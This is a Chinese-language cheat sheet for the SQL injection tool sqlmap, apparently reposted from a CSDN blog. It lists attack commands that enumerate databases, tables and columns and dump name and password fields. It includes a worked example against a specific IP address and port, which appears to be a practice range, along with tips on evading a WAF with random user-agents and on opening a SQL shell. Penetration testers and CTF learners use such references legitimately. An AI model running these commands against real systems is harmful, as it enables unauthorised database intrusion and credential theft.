-
sqlmap 官网:sqlmap: automatic SQL injection and database takeover tool
sqlmap文档地址:https://github.com/sqlmapproject/sqlmap/wiki/Usage
–hh 帮助手册 详细 -
重点部分
sqlmap.py -u “注入地址” --dbs // 列举数据库
sqlmap.py -u “注入地址” --current-db // 当前数据库
sqlmap.py -u “注入地址” --users // 列数据库用户
sqlmap.py -u “注入地址” --current–user // 当前用户
sqlmap.py -u “注入地址” --tables -D “数据库” // 列举数据库的表名
sqlmap.py -u “注入地址” --columns -T “表名” -D “数据库” // 获取表的列名
sqlmap.py -u “注入地址” --dump -C “列名字” -T “表名字” -D “数据库” //获取数据库下表的列信息最好在指令后面加 --level 3 --risk2,可以提升扫描时的深度于速率
--delay=1 指的是一秒钟发一个包
-
例如:
sqlmap.py -u “http://219.153.49.228:44109/new_list.php?id=1” --dbs //爆库
sqlmap.py -u “http://219.153.49.228:44109/new_list.php?id=1” -D stormgroup --tables //爆表
sqlmap.py -u “http://219.153.49.228:44109/new_list.php?id=1” -D stormgroup -T member --columns 爆列
sqlmap.py -u “http://219.153.49.228:44109/new_list.php?id=1” -D stormgroup -T member -C name,password --dump 爆字段值关于命令
1:--dbms=mysql (数据库为mysql) ———一般来说脚本为php,可以猜测是mysql数据库
如果数据库是sqlserver:--dbms=mssql ———如果脚本为aspx或者asp,可以猜测是mssql
2:--random-agent :是通过/usr/share/sqlmap/txt/user-agents.txt字典随机生成一个user-agent
(解释2: 使用任意浏览器进行绕过,尤其是在WAF配置不当的时候)
-- user-agnet:是手动指定一个user-angent
3:--flush-session 清除缓存
4:--level 3 --risk 2 (可视情况增加)加了后会跑得更全面
ps:level最高等级是5,risk最高等级为3,等级越高越全面,但速度会减慢
5:出数据:--current-db 查询当前数据库
-D security --tables 查询所有表
-D security -T users --columns 查询所有字段
-D security -T users -C username,password --dump 出数据
6,--is-dba 当前用户是否为管理员权限
7,--roles 列出数据库管理员角色
8,--sql-shell 执行mysql的一些命令,相当于navicat
9.辅助参数
--hex
--no-cast
10,--technique 判断是否有堆叠注入
尊重原创:
装载于:https://www.csdn.net/tags/NtjaAgzsNDk2NTMtYmxvZwO0O0OO0O0O.html